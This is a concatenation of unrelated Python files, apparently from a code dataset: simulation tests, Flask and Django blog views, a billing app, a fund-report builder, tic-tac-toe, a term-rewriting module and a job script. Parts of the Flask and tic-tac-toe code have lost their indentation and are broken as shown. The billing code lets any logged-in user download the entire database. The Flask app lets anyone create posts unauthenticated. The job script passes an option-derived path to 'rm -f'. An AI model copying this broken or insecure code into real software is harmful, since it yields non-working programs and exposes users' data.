        self.l = Launcher('simulations', 'parameter_ranges.txt')
        sim = self.l.launchSimulation(path=self.dir)
        self.outputfiles = ['out_phenotypes.txt', 'out_demography.txt', 'out_technology.txt', 'out_resources.txt', 'out_consensus.txt']
        for file in self.outputfiles:
            with open(self.dir+'/'+file) as f:
                lines = f.readlines()
                assert len(lines) == 10, "printed {0} generations instead of 10".format(len(lines))
                try:
                    floatlines = [float(x.split(',')[0]) for x in lines]
                except AssertionError as e:
                    shutil.rmtree('simulations')
                    assert False, "{0} are not numbers".format(lines)
        shutil.rmtree('simulations')

    def test_script_can_launch_all_simulations(self):
        self.dirs = ['pgg_test1','pgg_test2','pgg_test3']
        os.mkdir('simulations')
        for fold in self.dirs:
            shutil.copytree('test/test', 'simulations/'+fold)
            assert fold in os.listdir('simulations')
            assert os.path.isdir('simulations/'+fold), "not a directory"
        self.l = Launcher('simulations', 'parameter_ranges.txt')
        sim = self.l.launchSimulations(path='simulations')
        self.outputfiles = ['out_phenotypes.txt', 'out_demography.txt', 'out_technology.txt', 'out_resources.txt', 'out_consensus.txt']
        for fold in self.dirs:
            for file in self.outputfiles:
                try:
                    assert file in os.listdir('simulations/'+fold), "file {0} missing from output in folder {1}".format(file,fold)
                except AssertionError as e:
                    shutil.rmtree('simulations')
                    assert False, "file {0} missing from output in folder {1}".format(file,fold)
        shutil.rmtree('simulations')

    # From ranges file to finished simulations: every subfolder ends up
    # with all input AND output files.
    def test_full_workflow(self):
        with open("parameter_ranges.txt", 'w') as f:
            f.writelines(['fun,pgg\n','fb,2\n','b,0.5,0.7,0.1\n','c,0.05,0.07,0.01\n','gamma,0.01\n'])
        self.l = Launcher('simulations', 'parameter_ranges.txt')
        sims = self.l.launch()
        self.dirs = os.listdir('simulations')
        self.infiles = [INITIALISATION_FILE, INITIAL_PHENOTYPES_FILE, INITIAL_TECHNOLOGY_FILE, PARAMETER_FILE, FITNESS_PARAMETERS_FILE]
        self.outfiles = ['out_phenotypes.txt', 'out_demography.txt', 'out_technology.txt', 'out_resources.txt', 'out_consensus.txt']
        self.allfiles = self.infiles + self.outfiles
        for fold in self.dirs:
            for file in self.allfiles:
                try:
                    assert file in os.listdir('simulations/'+fold), "file {0} missing from folder {1}".format(file,fold)
                except AssertionError as e:
                    shutil.rmtree('simulations')
                    os.remove('parameter_ranges.txt')
                    assert False, "file {0} missing from output in folder {1}".format(file,fold)
        shutil.rmtree('simulations')
        os.remove('parameter_ranges.txt')
984,678 | 65fd328e5252379e333368c6250a60e681360a80 | from flask import render_template, url_for, flash, redirect, request, abort
from app.models import User, Post
from app.forms import RegistrationForm, LoginForm, UpdateAccountForm, PostForm
# ! here inport bcrypt not Bcrypt
from app import application, db, bcrypt
from flask_login import login_user, current_user, logout_user,login_required
from .main import run_result
import json
# call crawler
# Endpoint that triggers the crawler and returns its result directly.
@application.route('/e/e')
def call_crawler():
    print('be called')
    return run_result()
@application.route('/')
@application.route('/home')
def home():
    """Render the home page listing every post."""
    return render_template('home.html', posts=Post.query.all())
# method=['GET', 'POST'] allows get and post in this page
@application.route('/register', methods=['GET', 'POST'])
def register():
    """Create a new account; already-logged-in users are sent home."""
    if current_user.is_authenticated:
        return redirect(url_for('home'))
    form = RegistrationForm()
    # if submitted content is validated, flash and return to home page
    if form.validate_on_submit():
        # hash password from form; only the bcrypt hash is stored
        hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
        # create a user and save it into DB
        user = User(username=form.username.data, email=form.email.data, password=hashed_password)
        db.session.add(user)
        db.session.commit()
        flash(f'Account created for {form.username.data}!', category='success')
        return redirect(url_for('home'))
    return render_template('register.html', title='Register', form=form)
@application.route('/login', methods=['GET', 'POST'])
def login():
    """Authenticate a user against the stored bcrypt password hash."""
    if current_user.is_authenticated:
        return redirect(url_for('home'))
    form = LoginForm()
    if form.validate_on_submit():
        user = User.query.filter_by(email=form.email.data).first()
        # if user exists and the password is correct
        # user.password from DB, and second parameter from input
        if user and bcrypt.check_password_hash(user.password, form.password.data):
            # remember=... keeps the session alive across browser restarts
            login_user(user, remember=form.remember.data)
            return redirect(url_for('home'))
        else:
            flash('Login Unsuccessful', category='danger')
    return render_template('login.html', title='Login', form=form)
@application.route("/logout")
def logout():
logout_user()
return redirect(url_for('home'))
@application.route("/account", methods=['GET', 'POST'])
@login_required
def account():
update_form = UpdateAccountForm()
if update_form.validate_on_submit():
current_user.username = update_form.username.data
current_user.email = update_form.email.data
db.session.commit()
flash('Your account has been updated', category='success')
# return here to avoid something
return redirect(url_for('account'))
elif request.method == "GET":
update_form.username.data = current_user.username
update_form.email.data = current_user.email
image_file = url_for('static', filename=current_user.image_file)
return render_template('account.html', title='Account', image_file=image_file, form=update_form)
@application.route("/post/new", methods=['GET', 'POST'])
@login_required
def post_new():
post_form = PostForm()
if post_form.validate_on_submit():
post = Post(title=post_form.title.data, content=post_form.content.data, author=current_user)
db.session.add(post)
db.session.commit()
flash('Your post has been created', category='success')
return redirect(url_for('home'))
return render_template('create_post.html', title='New Post', form=post_form, legend='New Post')
@application.route("/post/<int:post_id>")
def post(post_id):
# get page or return 404 no found
post = Post.query.get_or_404(post_id)
return render_template('post.html', title=post.title, post=post)
@application.route("/post/<int:post_id>/update", methods=['GET', 'POST'])
@login_required
def update_post(post_id):
post = Post.query.get_or_404(post_id)
if post.author != current_user:
# Request Forbidden
abort(403)
update_form = PostForm()
if update_form.validate_on_submit():
post.title = update_form.title.data
post.content = update_form.content.data
db.session.commit()
flash('Your post has been updated!', 'success')
return redirect(url_for('post', post_id=post.id))
elif request.method == 'GET':
update_form.title.data = post.title
update_form.content.data = post.content
return render_template('create_post.html', title='Update Post',
form=update_form, legend='Update Post')
@application.route("/post/<int:post_id>/delete", methods=['POST'])
@login_required
def delete_post(post_id):
post = Post.query.get_or_404(post_id)
if post.author != current_user:
abort(403)
db.session.delete(post)
db.session.commit()
flash('Your post has been deleted!', 'success')
return redirect(url_for('home'))
@application.route("/post/new-app", methods=['GET', 'POST'])
def post_new_app():
if request.method == 'GET':
posts = Post.query.all()
data = []
for post in posts:
each_post = {}
each_post['id'] = str(post.id)
each_post['article_title'] = post.title
each_post['content'] = post.content
data.append(each_post)
# convert to json format
data_json = json.dumps(data, ensure_ascii=False)
return data_json
post = Post(title=request.json['title'], content=request.json['content'], user_id=1)
db.session.add(post)
db.session.commit()
return 'post successful'
|
984,679 | 5bffe1c3669850ebeaf6904b1c9a9cfa85d8d752 | import pandas as pd
import shutil
import openpyxl
from module.globals import *
import module.forms_maker._0420502_SCHA as scha
import module.forms_maker._0420502_Rasshifr as rf
import module.forms_maker._0420502_Podpisant as pp
import module.forms_maker._0420502_Zapiski as zap
import module.forms_maker._0420503_Prirost as prst
# from module.dataCheck import checkSheetsInFileID
# ================================================================
def main(id_fond, path_to_report, file_new_name, file_Avancore_scha):
    """Build an xbrl NAV (SCHA) report workbook for one fund.

    Copies the report template, fills it from the Avancore NAV export,
    and saves the result into *path_to_report* as *file_new_name*.
    """
    # ----------------------------------------------------------
    # # Load the identifiers file
    # df_identifier = pd.read_excel(dir_shablon + fileID,
    #                               sheet_name=None,
    #                               index_col=None,
    #                               header=None)
    # # Check the identifiers file for missing or extra sheets
    # # (111 - pas. - structure protection in the identifiers file)
    # checkSheetsInFileID(df_identifier)
    # ----------------------------------------------------------
    # Load the Avancore NAV (SCHA) export
    df_avancor = pd.read_excel(path_to_report + '/' + file_Avancore_scha,
                               index_col=None,
                               header=None)
    # start indexing from 1 instead of 0 (more convenient here)
    df_avancor.index += 1
    df_avancor.columns += 1
    # ----------------------------------------------------------
    # Create the new report file 'file_new_name'
    # as a copy of the template 'fileShablon'
    shutil.copyfile(dir_shablon + fileShablon, path_to_report + '/' + file_new_name)
    # ---------------------------------------------------------
    # Load the xbrl workbook we just created
    wb = openpyxl.load_workbook(filename=(path_to_report + '/' + file_new_name))
    # ----------------------------------------------------------
    # Build the xbrl NAV file:
    # Build the final NAV forms
    scha.scha(wb, id_fond, df_avancor)
    # Build the final breakdown (detail) forms
    rf.rashifr(wb, df_avancor, id_fond)
    # Build the NAV signatory forms
    pp.podpisant(wb, df_avancor, id_fond)
    # Build the NAV explanatory-note forms
    zap.zapiski_new(wb, df_avancor, id_fond)
    # Remove the Growth forms that are not filled in
    # (the remaining Growth forms are produced separately)
    prst.prirost(wb)
    # Save the result
    wb.save(path_to_report + '/' + file_new_name)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if __name__ == '__main__':
    # Import-only module; nothing runs standalone.
    pass
|
984,680 | b47a845ca2700fa9a5a5a0d23848116cf68647d7 | from django.shortcuts import render
from django.shortcuts import redirect
from django.shortcuts import get_object_or_404
from .models import Post
from .models import Tag
from django.views.generic import View
from .forms import TagForm
#from django.http import HttpResponse
# def post_list(request):
# return HttpResponse('<h1 align="center">Hello! Post_list</h1>')
# Create your views here.
# n = ['Nikolay', 'Aleksandr', 'Django', 'George']
def posts_list(request):
    """Render the blog index with every post."""
    return render(request, 'blog/index.html',
                  context={'posts': Post.objects.all()})
# def post_detail(request, slug):
# post = Post.objects.get(slug__iexact = slug)
# return render(request, 'blog/post_detail.html', context={'post':post})
class PostDetail(View):
    """Detail page for a single post, looked up by slug (404 if absent)."""

    def get(self, request, slug):
        found = get_object_or_404(Post, slug__iexact=slug)
        return render(request, 'blog/post_detail.html',
                      context={'post': found})
class TagDetail(View):
    """Detail page for a single tag, looked up by slug (404 if absent)."""

    def get(self, request, slug):
        found = get_object_or_404(Tag, slug__iexact=slug)
        return render(request, 'blog/tag_detail.html',
                      context={'tag': found})
class TagCreate(View):
    """Two-step tag creation: GET shows an empty form, POST validates
    and saves it, redirecting to the new tag on success."""

    def get(self, request):
        return render(request, 'blog/tag_create.html',
                      context={'form': TagForm()})

    def post(self, request):
        form = TagForm(request.POST)
        if form.is_valid():
            # save() returns the new Tag; redirect() uses its URL.
            return redirect(form.save())
        # Re-render with the bound form so field errors are shown.
        return render(request, 'blog/tag_create.html',
                      context={'form': form})
def tags_list(request):
    """Render the list of all tags."""
    return render(request, 'blog/tags_list.html',
                  context={'tags': Tag.objects.all()})
# def tag_detail(request, slug):
# tag = Tag.objects.get(slug__iexact = slug)
# return render(request, 'blog/tag_detail.html', context={'tag':tag})
|
984,681 | 44df75a01199a3b1233dd0141695b34e7ca2f22c | import os
from django.shortcuts import render, redirect
from django.http import HttpResponse, HttpResponseRedirect
from django.template.loader import render_to_string, get_template
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout
from django.contrib import messages
from django.urls import reverse
from django.core.exceptions import ValidationError
from django.contrib.auth import authenticate, login as django_login
from django.conf import settings
import billing.gui as gui
import billing.forms as forms
import billing.operations as operations
import billing.models as models
import billing.xls_templates as xls
def logout_user(request):
    """End the session and send the visitor to the login page."""
    logout(request)
    return redirect('login')
def about(request):
    """Render the static about page."""
    context = gui.get_init_context(request)
    return render(request, "billing/about_page.html", context)
def home(request):
    """Authenticated landing page; anonymous visitors go to login."""
    if not request.user.is_authenticated:
        return redirect('login')
    context = gui.get_init_context(request)
    context['content_links'] = gui.get_content_links(request)
    return render(request, "billing/home.html", context)
def login(request):
    """Show the login form and authenticate submitted credentials."""
    if request.user.is_authenticated:
        return redirect('home')
    context = gui.get_init_context(request)
    if request.POST:
        context['main_form'] = forms.LoginForm(request.POST, request=request)
        if context['main_form'].is_valid():
            user = authenticate(
                username=request.POST['username'],
                password=request.POST['password']
            )
            if user:
                django_login(request, user)
                return redirect('home')
            else:
                # keep the bound form so the error is rendered with it
                context['main_form'].add_error(None, "Incorect credentials")
    else:
        context['main_form'] = forms.LoginForm()
    return render(request, "billing/main_form.html", context)
@login_required(login_url='/login/')
def customer_assets(request, customer_id):
    """Show a data grid of all assets belonging to one customer."""
    context = gui.get_init_context(request)
    gv_name, rows, headers, actions = \
        models.CustomerAsset.\
        format_customer_assets_for_greed(request, {'customer__id': customer_id})
    context['dg_data'] = gui.setup_dataview(gv_name, rows, headers, actions)
    return render(request, "billing/datagrid_with_actions.html", context)
@login_required(login_url='/login/')
def send_invoice(request, invoice_id):
    """Render an invoice to PDF and e-mail it to the customer.

    Every outcome (missing addresses, already sent, PDF or send
    failure, success) redirects back to the referring page with a
    flash message.
    """
    invoice_data = models.Invoice.get_data_for_print(invoice_id)
    inv = models.Invoice.objects.get(id=invoice_id)
    try:
        customer_email = models.Email.objects.get(
            personal_data_id=inv.customer.personal_data.id
        ).decrypt().email_enc
    except Exception as e:
        messages.info(request, 'Customer mail not set!')
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
    try:
        # NOTE(review): the issuer Email row is fetched twice (address
        # then password); could be one lookup -- left as-is on purpose.
        issuer_email = models.Email.objects.get(
            personal_data_id=inv.customer.issuer.personal_data.id
        ).decrypt().email_enc
        issuer_email_password = models.Email.objects.get(
            personal_data_id=inv.customer.issuer.personal_data.id
        ).decrypt().email_password_enc
        issuer_name = models.Issuer.objects.get(
            id=inv.customer.issuer.id
        ).personal_data.full_name()
    except Exception as e:
        messages.info(request, 'Issuer mail not set!')
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
    if inv.is_sent:
        messages.info(request, 'Invoice Allredy sent!')
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
    context = gui.format_invoice_data_object(
        request, invoice_data, settings.STATIC_ROOT,
        models.Translation.translate, invoice_data['language_id']
    )
    template = get_template(invoice_data['template'])
    html = template.render(context)
    p = operations.PDF(html, False)
    if p.error:
        messages.error(request, p.error)
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
    pdf = p.memory_file, invoice_data['invoice_number'] + '.pdf'
    credentials = issuer_email, issuer_email_password
    r, v = operations.send_doc_to_customer(
        credentials, issuer_name, invoice_data['subject'],
        invoice_data['msg_text'], [customer_email], [], [pdf]
    )
    if not r:
        messages.error(request, v)
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
    # mark as sent only after a successful delivery
    inv.is_sent = True
    inv.save()
    messages.info(request, 'Invoice sent to %s!' % customer_email)
    return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
@login_required(login_url='/login/')
def view_invoice(request, invoice_id):
    """Render an invoice as an HTML page (uses STATIC_URL, not a PDF)."""
    data = models.Invoice.get_data_for_print(invoice_id)
    ctx = gui.format_invoice_data_object(
        request, data, settings.STATIC_URL,
        models.Translation.translate, data['language_id']
    )
    return render(request, data['template'], ctx)
@login_required(login_url='/login/')
def download_db(request):
    # Stream the raw database file (settings.DATABASES['default']['NAME'],
    # i.e. a file-backed DB such as SQLite) as a binary download.
    # NOTE(review): this hands the complete database to ANY logged-in user,
    # including every customer's encrypted mail credentials -- confirm that
    # all authenticated accounts are meant to have this level of access.
    response = HttpResponse(open(settings.DATABASES['default']['NAME'], 'rb'), content_type='application/octet-stream')
    response['Content-Disposition'] = \
        'attachment; filename="%s"' % os.path.basename(settings.DATABASES['default']['NAME'])
    return response
@login_required(login_url='/login/')
def download_invoice(request, invoice_id):
    """Render an invoice to PDF and return it as a file download."""
    data = models.Invoice.get_data_for_print(invoice_id)
    ctx = gui.format_invoice_data_object(
        request, data, settings.STATIC_ROOT,
        models.Translation.translate, data['language_id']
    )
    html = get_template(data['template']).render(ctx)
    pdf = operations.PDF(html, False)
    if pdf.error:
        messages.error(request, pdf.error)
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
    response = HttpResponse(pdf.memory_file, content_type='application/pdf')
    response['Content-Disposition'] = \
        'attachment; filename="%s.pdf"' % data['invoice_number']
    return response
@login_required(login_url='/login/')
def download_kpo(request, year):
    """Return the KPO ledger workbook for *year* as an .xlsx download."""
    xls_data = models.Invoice.get_kpo_for_year(year)
    workbook = xls.make_kpo(xls_data)
    xlsx_mime = (
        'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
    )
    response = HttpResponse(workbook, content_type=xlsx_mime)
    response['Content-Disposition'] = (
        'attachment; filename="%s"' % xls_data['file_name']
    )
    return response
@login_required(login_url='/login/')
def download_payment_report(request, invoice_id):
    """Render the bank payment report of a fully paid invoice as a PDF
    download; redirect back with a flash message when the payment is
    incomplete or PDF generation fails."""
    invoice_data = models.Invoice.get_payment_report(invoice_id)
    if not invoice_data:
        messages.info(request, 'Payment not complete for report!')
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
    context = gui.format_invoice_payment_report_data_object(
        invoice_data,
        settings.STATIC_ROOT
    )
    template = get_template('billing/bank_payment_report.html')
    html = template.render(context)
    p = operations.PDF(html, False)
    if p.error:
        messages.error(request, p.error)
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
    response = HttpResponse(p.memory_file, content_type='application/pdf')
    response['Content-Disposition'] = \
        'attachment; filename="payment report %s.pdf"' % \
        invoice_data['invoice_number']
    return response
@login_required(login_url='/login/')
def invoice_payment_change(request, invoice_id):
    """Jump to the admin change page of the payment behind an invoice."""
    payment_id = models.Invoice.get_invoice_payment(invoice_id)
    url = reverse('admin:billing_payment_change', args=(payment_id,))
    return HttpResponseRedirect(url)
@login_required(login_url='/login/')
def invoice_payment_report(request, invoice_id):
    """Show the bank payment report page for a fully paid invoice."""
    data = models.Invoice.get_payment_report(invoice_id)
    if not data:
        messages.info(request, 'Payment not complete for report!')
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
    ctx = gui.format_invoice_payment_report_data_object(
        data, settings.STATIC_URL
    )
    return render(request, "billing/bank_payment_report.html", ctx)
@login_required(login_url='/login/')
def customer_cart(request, customer_id):
    """Checkout page: payment form over the customer's open orders.

    On a valid POST the payment and its orders are persisted and the user
    is redirected to the customer's asset list; otherwise the (bound or
    blank) form is re-rendered.
    """
    context = gui.get_init_context(request)
    orders = models.Order.get_customer_orders(request, customer_id)
    if request.POST:
        context['main_form'] = forms.PaymentForm(
            request.POST, request=request,
            customer_id=customer_id, orders=orders
        )
        if context['main_form'].is_valid():
            models.Payment.save_payment_and_orders(
                request, customer_id,
                context['main_form'], orders
            )
            return redirect('customer_assets', customer_id=customer_id)
    else:
        context['main_form'] = forms.PaymentForm(
            request=request, customer_id=customer_id, orders=orders
        )
    return render(request, "billing/main_form.html", context)
@login_required(login_url='/login/')
def customer_offers(request, customer_id):
    """Offers page: add bundle items to a customer's cart.

    Two distinct forms POST here: any of the per-bundle item forms (adds
    an order item and refreshes the cart summary) or the main offers form
    (validates and proceeds to the cart page).
    """
    context = gui.get_init_context(request)
    context['cart_items'] = models.Order.get_customer_orders(
        request, customer_id, info=True
    )
    if request.POST:
        context['offer_item_forms'], submited_frm = gui.get_forms_list(
            request, models.BundleAssetPrice.get_available_bundles(request),
            forms.OrderItemForm
        )
        if submited_frm:
            # A bundle item form was submitted: store the item and rebuild
            # the cart summary so the new item shows up immediately.
            if submited_frm.is_valid():
                models.Order.save_order_item(request, customer_id, submited_frm)
                context['cart_items'] = models.Order.get_customer_orders(
                    request, customer_id, info=True
                )
            context['main_offers_form'] = forms.OffersForm()
        else:
            # The main offers form was submitted: on success continue to
            # the checkout/cart view.
            context['main_offers_form'] = forms.OffersForm(
                request.POST, request=request,
                orders=models.Order.get_customer_orders(request, customer_id)
            )
            if context['main_offers_form'].is_valid():
                return redirect('customer_cart', customer_id=customer_id)
    else:
        context['offer_item_forms'], submited_frm = gui.get_forms_list(
            request, models.BundleAssetPrice.get_available_bundles(request),
            forms.OrderItemForm
        )
        context['main_offers_form'] = forms.OffersForm()
    return render(request, "billing/offers.html", context)
@login_required(login_url='/login/')
def customers(request):
    """Searchable datagrid of customers/companies, filtered via the
    GET-bound search form's ``querry_filter`` (sic -- attribute name as
    defined on the form class)."""
    context = gui.get_init_context(request)
    context['filter_form'] = forms.SearchCustomersForm(
        request.GET, request=request
    )
    # NOTE(review): when the form is invalid 'dg_data' is absent from the
    # context -- the template must tolerate a missing grid.
    if context['filter_form'].is_valid():
        gv_name, rows, headers, actions = \
            models.Customer.\
            format_customer_company_for_greed(
                request,
                context['filter_form'].querry_filter
            )
        context['dg_data'] = gui.setup_dataview(gv_name, rows, headers, actions)
    return render(request, "billing/datagrid_with_actions.html", context)
@login_required(login_url='/login/')
def invoices(request):
    """Show every invoice in the standard datagrid."""
    context = gui.get_init_context(request)
    grid = models.Invoice.get_invoices_for_greed(request, {})
    context['dg_data'] = gui.setup_dataview(*grid)
    return render(request, "billing/datagrid_with_actions.html", context)
@login_required(login_url='/login/')
def kpo(request):
    """Let the user pick a year, then redirect to the KPO download."""
    context = gui.get_init_context(request)
    years = models.Invoice.get_all_years()
    if not request.POST:
        # First visit: render the unbound year-selection form.
        context['main_form'] = forms.KPOForm(request=request, years=years)
        return render(request, "billing/main_form.html", context)
    form = forms.KPOForm(request.POST, request=request, years=years)
    context['main_form'] = form
    if form.is_valid():
        return redirect('download_kpo', year=form.cleaned_data['year'])
    return render(request, "billing/main_form.html", context)
|
984,682 | 306ecde3283170cfec0529dbd042fff156ad7927 | class TicTacToe:
    def __init__(self):
        """Initialise turn bookkeeping, the coordinate lookup table, the
        ASCII board template and the (empty) move list."""
        self.xTurn = True
        self.turn_count = 0
        self.win_flag = False
        self.quit_flag = False
        self.game_pieces = ['X', 'O']
        self.coordinates = {"a1": 0, "b1": 1, "c1": 2, # The coordinates and their respective move_list indices
                            "a2": 3, "b2": 4, "c2": 5,
                            "a3": 6, "b3": 7, "c3": 8}
        self.lines = [" a b c\n",
                      " | | \n",
                      "1 {} | {} | {} \n", # Line 2
                      " _____|_____|_____\n",
                      " | | \n",
                      "2 {} | {} | {} \n", # Line 5
                      " _____|_____|_____\n",
                      " | | \n",
                      "3 {} | {} | {} \n", # Line 8
                      " | | "]
        self.move_list = {0: "-", 1: "-", 2: "-", # Where we store which game pieces are store on which spaces (Ex. [(3, x)]). Default is '-'
                          3: "-", 4: "-", 5: "-",
                          6: "-", 7: "-", 8: "-"}
    def main(self):
        """Main game loop: draw the board, read a move, count turns and
        test for a win once one is possible (turn 5 onward)."""
        while True:
            if self.quit_flag or self.win_flag:
                break # If the user decided to quit, break the loop.
            self.print_board() # Print out the ASCII board and current state
            self.take_move_input() # Take the move input from user
            self.turn_count += 1
            if self.turn_count >= 5: # After a win is possible...
                self.check_win() # ...Check if a win condition has been met
            self.xTurn = not self.xTurn # Change the turn
def take_move_input(self):
'''
Moves should be inputted in a coordinate format, like (A1 = Top left, C3 = Bottom Right)
'''
current_move = input("Enter move coordinates: ")
if (current_move == 'quit'):
print ("Game Over")
self.quit_flag = True
else:
if (current_move.lower() in self.coordinates):
if self.move_list[self.coordinates[current_move]] == "-":
if self.xTurn:
self.move_list[self.coordinates[current_move]] = self.game_pieces[0]
self.print_board() # Update the board
else:
self.move_list[self.coordinates[current_move]] = self.game_pieces[1]
self.print_board() # Update the board
else:
print("That space has already been played. Try again.")
input("Press enter to continue...")
self.main()
else:
print("Can't find those coordinates. Try again.")
input("Press enter to continue...")
self.main()
def print_board(self):
'''
For each line with game spaces,
'''
for i in range(len(self.lines)):
if (i == 2 or i == 5 or i == 8):
print(self.lines[i].format(self.move_list.get(i-2), self.move_list.get(i-1), self.move_list[i]))
else:
print(self.lines[i])
def check_win(self):
'''
Determine if a win condition has been met
'''
win_conditions = [(0,1,2), (3,4,5), (6,7,8), (0,3,6), (1,4,7), (2,5,8), (0,4,8), (2,4,6)] # All possible win conditions
for idx, tup in enumerate(win_conditions):
if self.move_list[tup[0]] in self.game_pieces and self.move_list[tup[0]] == self.move_list[tup[1]] and self.move_list[tup [1]] == self.move_list[tup[2]]:
self.win_flag = True
print("Game has been won")
break
else:
pass
# Entry point: play a single interactive game on the console.
if __name__ == '__main__':
    ttt = TicTacToe()
    ttt.main()
|
984,683 | f53cfad3d8a33d2c2a4b408c870a46d75ee3942f | """
Term rewriting systems
"""
import functools
from functools import reduce
from collections import namedtuple
import types
__all__ = ['MODULES', 'Var', 'Term', 'Rule', 'RULES_DB']
# Registry mapping class names to the modules defining them; consulted by
# Term.eval when resolving "static" terms.
MODULES = {}
# Global rule database applied by inner_most_strategy / Term.opt.
RULES_DB = []
class Var(str):
    """Representation of term variables: a variable is just a named string,
    distinguished from plain strings only by its type."""
class Term:
    """Representation of terms: a function or method name applied to a
    list of arguments, optionally marked static (class-level lookup)."""
    def __init__(self, f, a, s=False):
        # f: a callable, a method-name string, or the sentinel "__raw__";
        # a: argument list (sub-terms or plain values);
        # s: when True, Term.eval resolves the first argument as a class
        #    name through the MODULES registry.
        self.static = s
        self.function = f
        self.arguments = a
    def eval(self):
        """Evaluate a term (arguments are evaluated first, call-by-value)."""
        vargs = [e.eval() if issubclass(type(e), Term) else e for e in self.arguments]
        if isinstance(self.function,
                      (types.FunctionType, types.BuiltinFunctionType, functools.partial)):
            return self.function(*vargs)
        if self.function == "__raw__":
            # Raw wrapper: the term carries a literal value; return it as-is.
            return self.arguments[0]
        # arguments is assumed to be non-empty: it is either the class or object
        # to which the function/method is applied
        ocn = vargs.pop(0)
        # Getting the class or object
        if self.static:
            cls_obj = getattr(MODULES[ocn], ocn)
        else:
            cls_obj = ocn
        if self.function == '__init__':
            # Constructor call: instantiate rather than look up a method.
            return cls_obj(*vargs)
        return getattr(cls_obj, self.function)(*vargs)
    def opt(self):
        """Optimize a term by rewriting it to a fixpoint with RULES_DB."""
        return inner_most_strategy(self)
    def run(self):
        """Execute an optimized term."""
        return self.opt().eval()
    @staticmethod
    def __match(obj, pattern):
        # Match one argument position; returns a substitution dict on
        # success (possibly empty) or None on mismatch.
        if isinstance(pattern, Var):
            return {pattern: obj}
        if isinstance(obj, Term):
            return obj.match(pattern)
        if obj == pattern:
            return {}
        return None
    def match(self, pattern):
        """Pattern-match a term against a pattern; returns the substitution
        (dict Var -> value) or None when the match fails."""
        if isinstance(pattern, Var):
            substitution = {pattern: self}
        elif isinstance(pattern, Term) and self.function == pattern.function \
            and len(self.arguments) == len(pattern.arguments):
            terms = [Term.__match(self.arguments[idx], pattern.arguments[idx])
                     for idx in range(0, len(self.arguments))]
            # merge propagates None (failure) and rejects overlapping keys.
            substitution = reduce(merge, terms)
        else:
            substitution = None
        return substitution
    def __str__(self):
        if self.function == "__raw__":
            return "RAW(" + str(type(self.arguments[0])) + ")"
        args = reduce(lambda x, y: x + ", " + y, map(str, self.arguments))
        return ("[static]" if self.static else "") + str(self.function) + "(" + args + ")"
def subst(term, substitution):
    """Term substitution: replace every bound variable in *term* using
    *substitution*; non-terms are returned unchanged."""
    if isinstance(term, Var) and term in substitution:
        return substitution[term]
    if not isinstance(term, Term):
        return term
    new_args = [subst(arg, substitution) for arg in term.arguments]
    return type(term)(term.function, new_args, term.static)
def merge(dict1: dict, dict2: dict):
    """Merge two disjoint dictionaries.

    ``None`` (a failed match) is absorbing; overlapping keys mean a
    non-linear pattern and raise.
    """
    if dict1 is None or dict2 is None:
        return None
    if dict1.keys() & dict2.keys():
        raise Exception("Non linear patterns not supported")
    merged = dict(dict1)
    merged.update(dict2)
    return merged
# A rewrite rule: pattern ``left`` -> replacement ``right``, with a
# human-readable ``name`` and the Term subclass ``type`` it applies to.
Rule = namedtuple('Rule', 'left right name type')
def apply_rule(term: Term, rule: Rule):
    """Apply one rule to a term; the term is returned unchanged when the
    rule's type or pattern does not match."""
    if not isinstance(term, rule.type):
        return term
    substitution = term.match(rule.left)
    if substitution is None:
        return term
    rewritten = subst(rule.right, substitution)
    if isinstance(rewritten, Term):
        # Preserve the concrete Term subclass of the input.
        rewritten = term.__class__(rewritten.function, rewritten.arguments,
                                   rewritten.static)
    return rewritten
def apply_rules(term: Term, rules):
    """Fold every rule in *rules* over *term*, left to right."""
    result = term
    for rule in rules:
        result = apply_rule(result, rule)
    return result
def inner_most_strategy(term: Term):
    """Apply all available rules on a term (inner most strategy)."""
    if term.function == "__raw__":
        # Raw literals are never rewritten.
        return term
    condition = True
    prev_args = term.arguments
    new_args = []
    # Rewrite the arguments bottom-up until they stop changing: an argument
    # is "unchanged" when it matches its previous version with an empty
    # substitution; any other result counts as a change.
    while condition:
        new_args = [inner_most_strategy(e) if isinstance(e, Term) else e for e in prev_args]
        matches = [new_args[i].match(prev_args[i])
                   if isinstance(new_args[i], Term) else {} for i in range(0, len(new_args))]
        changes = functools.reduce(merge, matches, {})
        condition = changes != {}
        prev_args = new_args
    # Rebuild the term over the normalised arguments, then try the rules.
    new_t = type(term)(term.function, new_args, term.static)
    new_t = apply_rules(new_t, RULES_DB)
    if isinstance(new_t, Term):
        if new_t.match(term) == {}:
            # Fixpoint reached: the rewritten term equals the input.
            return new_t
        return inner_most_strategy(new_t)
    return new_t
|
984,684 | 90e822718e02692fc07b4a7a5773647c9438dc7a | #!/usr/bin/env python
import os,sys
import optparse
import fileinput
import commands
import time
import glob
import subprocess
from os.path import basename
import ROOT
if __name__ == "__main__":
usage = 'usage: %prog [options]'
parser = optparse.OptionParser(usage)
parser.add_option ('-f', '--fed', dest='fed', type = int, help='skim location folder', default=None)
parser.add_option ('-T', '--tag' , dest='tag' , help='folder tag name' , default='jobs')
parser.add_option ('-s', '--sleep' , dest='sleep' , help='sleep in submission' , default=False)
parser.add_option('--single', dest='single', help='write single sequence and run', action='store_true')
parser.add_option('--write', dest='write', help='write hdf', default=False, action ='store_true')
(opt, args) = parser.parse_args()
currFolder = os.getcwd ()
# Submit the jobs
# ---- ---- ---- ---- ---- ---- ---- ---- ---- ----
tagname = "/" + opt.tag if opt.tag else ''
jobsDir = currFolder + tagname
if os.path.exists (jobsDir) : os.system ('rm -f ' + jobsDir + '/*')
else : os.system ('mkdir -p ' + jobsDir)
executable = "modules_maps.py"
scriptFile = open ('%s/submit_map_%d.sh'% (jobsDir,opt.fed), 'w')
scriptFile.write ('#!/bin/bash\n')
scriptFile.write ('echo $HOSTNAME\n')
